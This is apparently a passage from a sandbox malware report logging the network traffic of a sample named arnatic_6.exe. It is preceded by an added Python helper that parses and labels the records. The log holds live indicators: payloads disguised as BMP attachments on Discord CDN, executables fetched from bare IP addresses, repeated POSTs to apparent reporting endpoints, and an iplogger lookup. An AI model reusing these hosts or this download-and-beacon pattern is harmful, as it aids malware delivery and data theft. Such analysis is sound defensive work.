    x-goog-hash: crc32c=1IN/4Q==
    x-goog-hash: md5=ZHJm6yR4WxbJ+1S8MEDdYg==
    x-goog-metageneration: 1
    x-goog-storage-class: STANDARD
    x-goog-stored-content-encoding: identity
    x-goog-stored-content-length: 630784
    X-GUploader-UploadID: ADPycdvQImk4lSQOB0d63DeyLPcTuzoSHdFCzwrmCQoPPL6gE4iltQX98neiNbfzGtmjAQYYSM5LcCtB-qY4-cQSUYQ
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jh2415fJpFyRAzSAlh5HJbvavuTry3V4jFswOLmXGzl8yCAF0iSVy9kpffSMP%2BvSTekDyiOeOxnVOUaJSG6bJElqsp1ByaV2TWyDO0q5Enkzno4P3FW%2Bn50dqoQJG6E%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
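As an added example (not tria.ge output and not code from this report), the Python helper below parses HTTP records shaped like the ones in this log, decodes the base64 MD5 that the x-goog-hash header carries into the hex form hash lookups expect, checks it against the ETag, and labels each transfer: the app.exe request was answered with a Cloudflare challenge page rather than a binary, while the cdn.discordapp.com fetches are attachment downloads served under an image MIME type to a non-browser process. The sample records are constructed from this report's own entries with the headers trimmed to those the rules consume; the browser-process allowlist and the outcome labels are the example's own assumptions.

```python
"""Triage helper for HTTP records in a sandbox network log (added example)."""
import base64
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")


def request(path: str, host: str) -> str:
    """Request block as it appears in the log: request line plus headers."""
    return f"GET {path} HTTP/1.1\nUser-Agent: {UA}\nHost: {host}\n"


# Constructed from this report's own entries; headers trimmed to those the
# rules below consume. "process" is the sandbox's process attribution.
RECORDS = [
    {"process": "arnatic_6.exe", "url": "https://fackerty.info/app.exe",
     "request": request("/app.exe", "fackerty.info"),
     "response": ("HTTP/1.1 403 Forbidden\nContent-Type: text/html; charset=UTF-8\n"
                  "CF-Chl-Bypass: 1\nServer: cloudflare\n")},
    {"process": "arnatic_6.exe",
     "url": "https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp",
     "request": request("/attachments/855697945679888404/860411180802899998/file2.bmp",
                        "cdn.discordapp.com"),
     "response": ("HTTP/1.1 200 OK\nContent-Type: image/x-ms-bmp\nContent-Length: 630784\n"
                  "Content-Disposition: attachment;%20filename=file2.bmp\n"
                  'ETag: "647266eb24785b16c9fb54bc3040dd62"\n'
                  "x-goog-hash: crc32c=1IN/4Q==\nx-goog-hash: md5=ZHJm6yR4WxbJ+1S8MEDdYg==\n")},
    {"process": "arnatic_6.exe",
     "url": "https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp",
     "request": request("/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp",
                        "cdn.discordapp.com"),
     "response": ("HTTP/1.1 200 OK\nContent-Type: image/x-ms-bmp\nContent-Length: 289280\n"
                  "Content-Disposition: attachment;%20filename=ChromeExtract.bmp\n"
                  'ETag: "34acd79244e9ab3ec01135b4d1120e4a"\n'
                  "x-goog-hash: crc32c=cOjqGw==\nx-goog-hash: md5=NKzXkkTpqz7AETW00RIOSg==\n")},
]

# Assumed allowlist: processes for which a browser User-Agent is expected.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


def parse_block(raw: str) -> Tuple[str, Dict[str, List[str]]]:
    """Return (start line, headers). Names are lower-cased; repeated headers
    such as x-goog-hash keep every value instead of overwriting the first."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def goog_hashes(headers: Dict[str, List[str]]) -> Dict[str, str]:
    """Decode each 'algo=base64' x-goog-hash value into hex (md5, crc32c)."""
    out: Dict[str, str] = {}
    for value in headers.get("x-goog-hash", []):
        algo, _, b64 = value.partition("=")   # split on the first '=' only; padding stays
        out[algo.strip()] = base64.b64decode(b64).hex()
    return out


@dataclass
class Verdict:
    url: str
    status: int
    outcome: str
    md5: Optional[str]
    etag_matches_md5: Optional[bool]
    reasons: List[str]


def classify(record: dict) -> Verdict:
    """Label one transfer. Outcome names are this example's own."""
    _, req = parse_block(record["request"])
    status_line, resp = parse_block(record["response"])
    status = int(status_line.split()[1])

    def first(name: str) -> str:
        return resp.get(name, [""])[0]

    ctype = first("content-type").lower()
    md5 = goog_hashes(resp).get("md5")
    etag = first("etag").strip('"').lower()
    etag_ok = (etag == md5) if (md5 and etag) else None
    reasons: List[str] = []

    # Cloudflare answered with a challenge page, not the requested object.
    if status == 403 and "cf-chl-bypass" in resp and ctype.startswith("text/html"):
        reasons.append("403 with CF-Chl-Bypass and an HTML body: object not delivered")
        return Verdict(record["url"], status, "blocked_by_cloudflare_challenge",
                       md5, etag_ok, reasons)

    if (record["process"].lower() not in BROWSER_PROCESSES
            and req.get("user-agent", [""])[0].startswith("Mozilla/")):
        reasons.append(f"{record['process']} is not a browser but sends a browser User-Agent")
    if first("content-disposition").lower().startswith("attachment") and ctype.startswith("image/"):
        reasons.append("attachment download served under an image MIME type")
    if etag_ok is False:
        reasons.append("ETag disagrees with x-goog-hash md5")

    outcome = "payload_download_suspected" if status == 200 and len(reasons) >= 2 else "no_rule_matched"
    return Verdict(record["url"], status, outcome, md5, etag_ok, reasons)


if __name__ == "__main__":
    for rec in RECORDS:
        v = classify(rec)
        print(f"{v.status} {v.outcome:32} md5={v.md5} etag_ok={v.etag_matches_md5} {v.url}")
        for r in v.reasons:
            print("   -", r)
```

Run it as a script to see one line per record; the decoded md5 is the value to pivot on in other analyses of the same files. The ETag comparison is a cheap integrity check on the record itself (both come from the same backend), not proof of what the file is; that still requires the body or the sandbox's dropped-file hashes.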
GET  https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp
  Process:        arnatic_6.exe
  Remote address: 162.159.135.233:443
  Note: a 289280-byte attachment download served under an image MIME type to arnatic_6.exe. The ETag is the hex form of the base64 MD5 in x-goog-hash (34acd79244e9ab3ec01135b4d1120e4a).
  Request:
    GET /attachments/855697945679888404/859709260588646410/ChromeExtract.bmp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: cdn.discordapp.com
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 02 Jul 2021 07:15:33 GMT
    Content-Type: image/x-ms-bmp
    Content-Length: 289280
    Connection: keep-alive
    CF-Ray: 6686156788f6061c-FRA
    Accept-Ranges: bytes
    Age: 168447
    Cache-Control: public, max-age=31536000
    Content-Disposition: attachment;%20filename=ChromeExtract.bmp
    ETag: "34acd79244e9ab3ec01135b4d1120e4a"
    Expires: Sat, 02 Jul 2022 07:15:33 GMT
    Last-Modified: Wed, 30 Jun 2021 08:17:40 GMT
    Vary: Accept-Encoding
    CF-Cache-Status: HIT
    Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    x-goog-generation: 1625041060400438
    x-goog-hash: crc32c=cOjqGw==
    x-goog-hash: md5=NKzXkkTpqz7AETW00RIOSg==
    x-goog-metageneration: 1
    x-goog-storage-class: STANDARD
    x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 289280
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdsULRLfAw9q93SVhRNB4Vpz-F7McF5Fn9qoOYJxLB-dRfWSIXSxplIU75pzYfkUl1lt395qIeyzbglAt8YTzwc
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2oV9h57nPR2xYOyN6iBa%2BC23lMEY5kh2safK4KS77tLNT1GjOaBR2EQP5ElxwqOBwQaLNfKrJAkB158j4TK3kVqhvApvgz10zSuIuHKlwn6dQiFJrOeVp0BHo3x7fqw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:36 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07abbf5c00000b433111c000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SuI960pmCIBl1fiBlPEmXTm%2FVeLXiO%2BXAoU5Rv%2BVBmyepUtroNjOVm88VB3wLZJOa7sLDt8639k5A3eKiG7nhal8wtpAYpRQ1QfOOHX3ZUu%2FMgL2Mqjm601pxQqr7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668615789b5b0b43-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        220.125.1.129
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        210.180.252.88
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        109.102.255.230
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        187.156.139.53
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        58.228.68.101
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        186.6.236.46
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        109.98.58.98
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.158.247.38
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 271
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 8
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://lahuertasonora.com/upload/
  Remote address:
  220.125.1.129:80
  Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 203
  Host: lahuertasonora.com
  Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:15:44 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 334
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://lahuertasonora.com/upload/
  Remote address:
  220.125.1.129:80
  Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 310
  Host: lahuertasonora.com
  Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:15:47 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 334
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:15:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07abeb2900007cb8578ba000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jcD0hf2ouPRgkreN9sof1%2BmxubMtcV7CS5ftsv8mP4LGjYj96GB2GLavoujA3IjTrR88XYRWrD9yeGs%2FzaJOTzFjiLAMg5N%2FHaIl3Gk5EcTulLn4Ic3lNw0TRLspNg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 668615bea8577cb8-MUC
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST
  http://lahuertasonora.com/upload/
  Remote address:
  220.125.1.129:80
  Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 334
  Host: lahuertasonora.com
  Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:15:51 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 334
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://lahuertasonora.com/upload/
  Remote address:
  220.125.1.129:80
  Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 230
  Host: lahuertasonora.com
  Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:15:55 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 334
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://lahuertasonora.com/upload/
  Remote address:
  220.125.1.129:80
  Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 165
  Host: lahuertasonora.com
  Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:16:01 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 56
  Connection: close
  Content-Type: text/html; charset=utf-8
• flag-unknown
  POST
  http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address:
  104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:16:00 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ac1d9900004c08eb2dc000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Jhzu5tGfja0lryJ3zJf3P4ahxBNotp5Hq8Au04AWrZH0ihQoinBTJP8BWdsGO041hVIsPmGMh8wuCskkdPOwilPIWZZQpLkv%2BlyDWQuxYKeLBVKCjE8Zua2E67yemA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686160f5a494c08-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/860411175945895936/file3.bmp
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/855697945679888404/860411175945895936/file3.bmp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:04 GMT
                                                                                                                                                                                        Content-Type: image/x-ms-bmp
                                                                                                                                                                                        Content-Length: 275968
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 66861629caa7d10d-TXL
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 29
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=file3.bmp
                                                                                                                                                                                        ETag: "7f0c94a1625791b04fb44f1e2059ba82"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:16:04 GMT
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 06:46:50 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1625208410070785
                                                                                                                                                                                        x-goog-hash: crc32c=OAqU0w==
                                                                                                                                                                                        x-goog-hash: md5=fwyUoWJXkbBPtE8eIFm6gg==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 275968
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdu2RMDMUxHRj5bNxRHD4T9mkgQCVzjDg03U_SEuJ8uHSXOBBwpTK1s-P2T66VF8oFejkjp9MT2g7FjGSHwmoeL02wkzOA
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NZX1z2tBLx88cjFD6nSXyegb71kUaAcwY0rwJ%2FK%2FpNPjId3rzqyP%2BgYTSg7k8bBeVxpOBTuoDCC%2Bm0XC0bBBuRhg0OBFR5Rtv97OPBf%2B1Zqh6a9CkxXSOBPgu4HgTR4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://152.89.247.174/blog/files/notepad.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        152.89.247.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /blog/files/notepad.exe HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Host: 152.89.247.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:05 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 10:36:26 GMT
                                                                                                                                                                                        ETag: "b1201-5c60d6946db00"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 725505
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file6.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file6.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:08 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 08:23:41 GMT
                                                                                                                                                                                        ETag: "5fd88-5c60b8e869d95"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 392584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file3.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 07:04:22 GMT
                                                                                                                                                                                        ETag: "a54c8-5c61e90b9eba8"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 677064
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
